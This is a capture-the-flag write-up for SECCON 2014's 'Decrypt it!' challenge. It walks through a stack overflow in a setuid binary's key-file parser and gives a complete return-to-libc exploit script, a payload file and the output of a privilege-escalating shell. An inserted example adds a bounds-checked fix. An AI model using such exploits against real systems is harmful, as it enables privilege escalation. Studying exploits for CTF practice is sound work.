SECCON 2014 Online Qualifier (Japanese) Decrypt it! Write-up: the back side
The front side is here.
We are given an encryption program and an encrypted file, and the task is to decrypt the file. The encryption command is
$ ./crypt 1 pub.txt flag.pdf flag.bin
crypt has a buffer overflow vulnerability, so let's attack it.
[kusano@www10383uf Decrypt it!]$ ll
total 704
-rwsr-xr-x 1 seccon seccon  13956 Aug  3 17:12 crypt
-rw-rw-r-- 1 kusano kusano 701103 Aug  3 17:12 flag.pdf
In this situation, the goal is to pass a crafted pub.txt to crypt with the command above and launch a shell with uid=seccon.
Environment
crypt's stack is non-executable, SSP (stack guard) is present, and PIE is disabled.
[kusano@www10383uf Decrypt it!]$ objdump -p crypt

crypt:     file format elf32-i386

Program Header:
    PHDR off    0x00000034 vaddr 0x08048034 paddr 0x08048034 align 2**2
         filesz 0x00000120 memsz 0x00000120 flags r-x
  INTERP off    0x00000154 vaddr 0x08048154 paddr 0x08048154 align 2**0
         filesz 0x00000013 memsz 0x00000013 flags r--
    LOAD off    0x00000000 vaddr 0x08048000 paddr 0x08048000 align 2**12
         filesz 0x00002277 memsz 0x00002277 flags r-x
    LOAD off    0x00002ee0 vaddr 0x0804bee0 paddr 0x0804bee0 align 2**12
         filesz 0x000001c0 memsz 0x000001cc flags rw-
 DYNAMIC off    0x00002ef8 vaddr 0x0804bef8 paddr 0x0804bef8 align 2**2
         filesz 0x000000f8 memsz 0x000000f8 flags rw-
    NOTE off    0x00000168 vaddr 0x08048168 paddr 0x08048168 align 2**2
         filesz 0x00000044 memsz 0x00000044 flags r--
EH_FRAME off    0x00001d94 vaddr 0x08049d94 paddr 0x08049d94 align 2**2
         filesz 0x000000c4 memsz 0x000000c4 flags r--
   STACK off    0x00000000 vaddr 0x00000000 paddr 0x00000000 align 2**2
         filesz 0x00000000 memsz 0x00000000 flags rw-
   RELRO off    0x00002ee0 vaddr 0x0804bee0 paddr 0x0804bee0 align 2**0
         filesz 0x00000120 memsz 0x00000120 flags r--
...
[kusano@www10383uf Decrypt it!]$ objdump -d crypt
...
 8049b7d:	8b 94 24 ac 01 00 00 	mov    0x1ac(%esp),%edx
 8049b84:	65 33 15 14 00 00 00 	xor    %gs:0x14,%edx
 8049b8b:	0f 84 91 00 00 00    	je     8049c22 <uncompress@plt+0xe02>
 8049b91:	e9 87 00 00 00       	jmp    8049c1d <uncompress@plt+0xdfd>
...
 8049c1d:	e8 5e f1 ff ff       	call   8048d80 <__stack_chk_fail@plt>
 8049c22:	8b 5d fc             	mov    -0x4(%ebp),%ebx
 8049c25:	c9                   	leave
 8049c26:	c3                   	ret
I disabled ASLR. As described later, I could not attack under an ASLR-enabled environment.
[kusano@www10383uf Decrypt it!]$ sudo sysctl -w kernel.randomize_va_space=0
kernel.randomize_va_space = 0
Program analysis
crypt's main function is roughly as follows. The binary is stripped, so the class and method names are made up.
#include <cstdlib>
#include <fstream>
#include <string>
using namespace std;

// 0x080498b9
int main(int argc, char **argv)
{
    int argc2 = argc;
    int mode = 0;
    if (argc<=4) return 1;
    mode = atoi(argv[1]);
    int key[16];
    int keynum = 0;
    string str;
    ifstream stream;
    stream.open(argv[2]);
    while (!stream.eof()) {
        stream >> str;
        key[keynum++] = atoi(str.c_str());   // no bound on keynum: overflows key[]
    }
    stream.close();
    Crypter crypter;
    if (mode!=0) {
        crypter.loadPublicKey(key);
        string plain(argv[3]);
        crypter.loadPlain(plain);
        crypter.encrypt();
        crypter.save(argv[4], false);
    } else {
        if (crypter.loadPrivateKey(key)!=0) return -1;
        string cipher(argv[3]);
        crypter.loadCipher(cipher);
        crypter.decrypt();
        crypter.save(argv[4], true);
    }
    return 0;
}
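As an added example, not code from the write-up: the key-reading loop in the shape reconstructed above, beside a bounds-checked replacement that a fixed crypt could use. The function names are hypothetical; the 16-word capacity is the int key[16] from main.

```cpp
// Added example, not from the write-up: the key-file reader as the write-up
// reconstructs it, next to a bounds-checked replacement. Function names are
// hypothetical; 16 matches the int key[16] in crypt's main.
#include <cerrno>
#include <climits>
#include <cstdlib>
#include <istream>
#include <sstream>
#include <string>

const int KEY_WORDS = 16;

// Shape of the vulnerable loop: keynum is never compared with the array
// size, so a long pub.txt keeps writing past key[15] into the locals behind
// it. A second defect: "while (!eof())" runs once more after the last token
// when the file ends in a newline, storing the previous token again.
int read_keys_unsafe(std::istream &in, int *key)
{
    std::string str;
    int keynum = 0;
    while (!in.eof()) {
        in >> str;
        key[keynum++] = std::atoi(str.c_str());
    }
    return keynum;
}

// Hardened reader: the extraction itself is the loop condition, the write is
// refused once the array is full, and tokens with trailing characters such as
// "0_______________/bin/sh" (which atoi silently reads as 0) are rejected.
// Returns the number of values stored, or -1 on any error.
int read_keys_safe(std::istream &in, int *key, int cap)
{
    std::string tok;
    int n = 0;
    while (in >> tok) {
        if (n >= cap)
            return -1;                  // more numbers than key[] can hold
        errno = 0;
        char *end = NULL;
        long v = std::strtol(tok.c_str(), &end, 10);
        if (end == tok.c_str() || *end != '\0')
            return -1;                  // not a plain decimal integer
        if (errno == ERANGE || v < INT_MIN || v > INT_MAX)
            return -1;                  // does not fit in an int
        key[n++] = static_cast<int>(v);
    }
    return n;
}
```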
The stack layout is as follows.
esp+0x1c   argc2
esp+0x20   key
esp+0x60   crypter
esp+0x7c   str
esp+0x80   plain
esp+0x84   cipher
esp+0x88   keynum
esp+0x8c   mode
esp+0x94   stream
esp+0x1ac  canary
esp+0x1b0  padding left by "and $0xfffffff0,%esp"
esp+0x1b4  ebx
esp+0x1b8  ebp
esp+0x1bc  return address
esp+0x1c0  argc
esp+0x1c4  argv
Attack strategy
Using return-to-libc, execute
setreuid(uid of seccon, -1); system("/bin/sh");
to get a shell.
Everything after key can be overwritten with arbitrary values. By overwriting keynum with a suitable value, the canary can be skipped and values written from the return address onward. Of the variables between key and keynum, all except str have not been initialized yet at this point, so any value can be written over them. str is a pointer to a buffer, so unless it is given a valid value the program crashes before returning. atoi ignores any trailing characters, so the string used as system's argument can simply be appended after a number.
Information gathering
We need user seccon's uid, the address of setreuid, the address of system, and the value of str.
[kusano@www10383uf Decrypt it!]$ id seccon
uid=505(seccon) gid=506(seccon) groups=506(seccon)
[kusano@www10383uf Decrypt it!]$ gdb --arg ./crypt 1 pub.txt flag.pdf flag.bin
...
(gdb) b *0x8049972
Breakpoint 1 at 0x8049972
(gdb) r
Starting program: /home/kusano/seccon/Decrypt it!/crypt 1 pub.txt flag.pdf flag.bin

Breakpoint 1, 0x08049972 in ?? ()
Missing separate debuginfos, use: debuginfo-install glibc-2.12-1.132.el6_5.2.i686 libgcc-4.4.7-4.el6.i686 libstdc++-4.4.7-4.el6.i686 zlib-1.2.3-29.el6.i686
(gdb) p setreuid
$1 = {<text variable, no debug info>} 0x68fc10 <setreuid>
(gdb) p system
$2 = {<text variable, no debug info>} 0x5f0210 <system>
(gdb) x/x $esp+0x7c
0xffffd55c:     0x0804f184
They are 505, 0x68fc10, 0x5f0210 and 0x0804f184 respectively.
The pointer in str is reallocated when the buffer is too small for the string being read, so I took its value after one string had already been read. When attacking, having a long string read first means the address will no longer change through reallocation.
Exploit
exploit.py
# coding: utf-8
cmd = "/bin/sh"
uid = 505
setreuid = 0x0068fc10
system = 0x005f0210
strbuf = 0x0804f184
# If the command string is written right after the 0, it gets overwritten
# when a large number is read in, so leave a gap
pad = 16
print "0" + "_"*(pad-1) + cmd
for _ in range((0x7c-0x20)/4-1):
    print 0
print strbuf
for _ in range((0x88-0x80)/4):
    print 0
# make key[keynum] point at the return address
# keynum++ happens right afterwards, so -1
print (0x1bc-0x20)/4-1
print setreuid
# pop; pop; ret;
# clears setreuid's arguments before calling system
print 0x080498b6
print uid
print uid
print system
print 0
print strbuf + pad
[kusano@www10383uf Decrypt it!]$ python exploit.py > pub.txt
[kusano@www10383uf Decrypt it!]$ cat pub.txt
0_______________/bin/sh
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
134541700
0
0
102
6880272
134518966
505
505
6226448
0
134541716
[kusano@www10383uf Decrypt it!]$ ./crypt 1 pub.txt flag.pdf flag.bin
sh-4.1$ id
uid=505(seccon) gid=500(kusano) groups=506(seccon),10(wheel),500(kusano)
ASLR
Apparently the intended challenge was to exploit this with ASLR enabled, but that is quite difficult.
Return-oriented programming is an option, but the program is short and there aren't enough gadgets.
The exploit code above does not depend on the stack position, but it does depend on the libc position and on the heap position of str. For libc, the randomization applied by ASLR is relatively small, so increasing the number of attempts should work. The heap position is the hard part. The buffer str points to does not just store the string: the string length and buffer size are stored right before the position str points to, so simply overwriting str with some writable address is not enough.
[kusano@www10383uf Decrypt it!]$ gdb --arg ./crypt 1 pub.txt flag.pdf flag.bin
...
(gdb) b *0x8049972
Breakpoint 1 at 0x8049972
(gdb) r
...
(gdb) x/x $esp+0x7c
0xffffd55c:     0x0804f184
(gdb) x/32x 0x0804f140
0x804f140:      0x00000000      0x00000000      0x00000000      0x00000000
0x804f150:      0x00000000      0x00000000      0x00000000      0x00000000
0x804f160:      0x00000000      0x00000000      0x00000000      0x00000000
0x804f170:      0x00000000      0x00000029      0x00000017      0x00000017
0x804f180:      0x00000000      0x5f5f5f30      0x5f5f5f5f      0x5f5f5f5f
0x804f190:      0x5f5f5f5f      0x6e69622f      0x0068732f      0x0001ee69
0x804f1a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804f1b0:      0x00000000      0x00000000      0x00000000      0x00000000